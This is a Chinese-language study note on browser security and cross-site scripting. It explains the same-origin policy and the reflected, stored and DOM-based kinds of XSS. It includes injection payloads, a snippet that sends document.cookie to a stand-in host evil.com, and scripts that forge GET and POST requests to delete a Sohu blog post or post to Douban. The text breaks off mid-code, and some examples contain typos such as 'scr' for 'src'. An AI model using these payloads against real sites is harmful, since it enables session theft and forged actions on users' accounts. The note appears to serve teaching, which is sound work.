XSS漏洞学习笔记

浏览器安全

同源策略 
影响源的因素：host,子域名,端口,协议 
a.com通过以下代码:

<script scr=http://b.com/b.js>

加载了b.com上的b.js，但是b.js是运行在a.com页面中的，因此相对于当前打开的页面(a.com)来说，b.js的源就应该是a.com而非b.com 
不同于XMLHttpRequest的是，通过src属性加载的资源，浏览器限制了JavaScript的权限，使其不能读、写返回的内容。 
XMLHttpRequest不能跨域访问资源。但是有跨域请求的需求，因此W3C指定了XMLHttpRequest的跨域访问标准。它需要通过目标域返回的Http头来授权是否允许跨域访问，因此HTTP头对于JavaScript来说一般是无法控制的，所以认为这个方案是可行的。注意：这个跨域访问方案的安全基础就是信任“Javascript无法控制该HTTP头”，如果此信任基础被打破，则此方案也就不再安全。

浏览器沙箱 
每个单独的页面是一个进程。浏览器加载的第三方插件如Flash、Java、PDF、.NET Framework都成为了被攻击热点。

恶意网址拦截 
浏览器使用黑名单策略来警告用户。常见的恶意网址分为两类: 
1、挂马网站，通常包含恶意的Javascript或Flash，通过利用浏览器的漏洞，执行shellcode，在电脑中植入木马 
2、钓鱼网站:模仿知名网站的相似页面

高速发展的浏览器安全

跨站脚本攻击

Cross Site Script,因为和CSS重名，所以改名XSS

XSS简介

通常指黑客通过“HTML注入”纂改了页面，插入了恶意的脚本，从而在用户浏览页面时，控制用户浏览器的一种攻击。在一开始，这种攻击的演示案例是跨域的，所以叫“跨站脚本”。但是发展到今天，由于Javascript的强大功能以及网站前端应用的复杂化，是否跨域已经不再重要。但是由于历史原因，这个名字保留了下来。 
假设一个页面把用户输入的参数输出到页面上：

1 <?php
2 $input=$_GET["param"];
3 echo "<div>".$input."</div>";
4 ?>

如果提交一段HTML代码:

http://www.a.com/test.php?param=alert(/xss/)

会发现alert(/xss/)被执行了。 
XSS分为以下几类: 
1)反射型XSS: 就如上面的例子，也就是黑客需要诱使用户点击链接。也叫作”非持久型XSS“(Non-persistent XSS) 
2)存储型XSS:把用户输入的数据”存储“在服务器端。这种XSS具有很强的稳定性。 
比较常见的一个场景是，黑客写下一篇包含恶意Javascript代码的博客文章，文章发表后，所有访问该博客文章的用户，都会在他们的浏览器中执行这段恶意的Javascript代码。黑客把恶意的脚本保存在服务器端，所以中XSS攻击就叫做”存储型XSS”。 
3)DOM based XSS:也是一种反射型XSS，由于历史原因被单独列出来了。通过修改页面的DOM节点形成的XSS，称之为DOM Based XSS。

看如下代码

这段代码的作用就是点击write按钮后在当前页面插入一个链接。 
构造如下数据:

’ οnclick=alert(/xss/) //

输入后，页面代码就成了

testLink

首先用一个单引号闭合掉href的第一个单引号，然后插入一个onclick事件，最后再用注释符//注释掉第二个单引号。 
实际上，这里还有另外一种利用方式—除了构造一个新事件外，还可以选择闭合掉<a>标签，并插入一个新的HTML标签。尝试如下输入:

'><img scr=# onerror=alert(/xss2/) /><'

页面代码编程

<a href='http://cracer.com/blog/'><img scr=# onerror=alert(/xss2/) /><''>testLink</a>.

XSS攻击进阶

初探XSS Payload 
XSS Payload就是JavaScript脚本(还可以是Flash或其他富客户端的脚本)，所以任何Javascript脚本能做到的事情，XSS Payload都能做到。 
一个最常见的XSS Payload就是读取浏览器的Cookie对象，从而发起”Cookie劫持”攻击。 
Cookie中一般加密保存了当前用户的登录凭证。Cookie如果丢失，往往意味着用户的登录凭证丢失。换句话说，攻击者可以不用通过密码，而直接登录进用户的账户。 
如下所示，攻击者先加载一个远程脚本: 
http://www.a.com/test.htm?abc=“><script scr=http://www.evil.com/evil.js ></script> 
真正的XSS Payload现在这个远程脚本中，避免直接在URL的参数里写入大量的JavaScript代码。 
在evil.js中，可以通过如下代码窃取Cookie:

var img=document.createElement("img");
img.src="http://www.evil.com/log?"+escape(document.cookie);
document.body.appendChild(img);

这段代码在页面中插入了一张看不见的图片，同时把document.cookie对象作为参数发送到远程服务器。 
事实上，http://www.evil.com/log 并不一定要存在，因为这个请求会在远程服务器的Web日志中留下记录 。 
这样就完成了一个最简单的窃取Cookie的XSS Payload。 
黑客可以用这个Cookie直接登录。 
防止:Cookie的“HttpOnly”标识可以防止”Cookie劫持”，我们将在稍后的章节中在具体介绍。

强大的XSS Payload 
构造Get与Post请求:例如在Sohu上有一篇文章， 想通过XSS删除它，该如何做呢? 
假设Sohu博客所在域的某页面存在XSS漏洞，那么通过JavaScript，这个过程如下: 
正常删除该文章的链接是:http://blog.sohu.com/manage/entry.do?m=delete&id=156713012 
对于攻击者来说，只需要直到文章的id，就能够通过这个请求删除这篇文章了。 
攻击者可以通过插入一张图片来发起一个get请求:

var img=document.createElement("img");
img.scr="http://blog.sohu.com/manage/entry.do?m=delete&id=156713012";
document.body.appendChild(img);

攻击者只需要让博客的作者执行这段JavaScript代码(XSS Payload)，就会把这篇文章删除。在具体攻击中，攻击者将通过XSS诱使用户执行XSS Payload。 
再看一个复杂点的例子。如果网站应用者接受POST请求，那么攻击者如何实施XSS攻击呢? 
下例是Douban的一处表单。攻击者将通过Javascript发出一个post请求，提交此表单，最终发出一条新的消息。

 1 var f=document.createElement("form");
 2 f.action="";
 3 f.method="post";
 4 document.body.appendChild(f);
 5 var i1=document.createElement("input");
 6 i1.name=" ck";
 7 i1.value=" JiuY";
 8 f.appendChild(i1);
 9 var i2=document.createElement("input");
10 i2.name=" mb_text";
11 i2.value="testtestseset";
12 f.appendChild(i2);
13 f.submit();

如果表单参数很多的话，通过构造DOM的方式，代码将会很冗长。所以可以直接写HTML代码:

var dd=document.createElement("div");
document.body.appendChild(dd);
dd.innerHTML='<form action="" method="post" id="xssform" name="mbform">'+
'<input type="hidden" name="ck" value="JiuY" />'+
'<input type="hidden" name="mb_text" value="testetst" />' +
'</form>'
document.getElementById("xssform").submit();

第二种方法是，通过XMLHttpRequest发送一个POST请求:

 1 var url = "http://www.douban.com";
 2 var postStr = "ck=JiuY&mb_text=test1234";
 3 var ajax = null;
 4 if (window.XMLHttpRequest) {
 5     ajax = new XMLHttpRequest();
 6 } else if (window.ActiveXObject) {
 7     ajax = new Act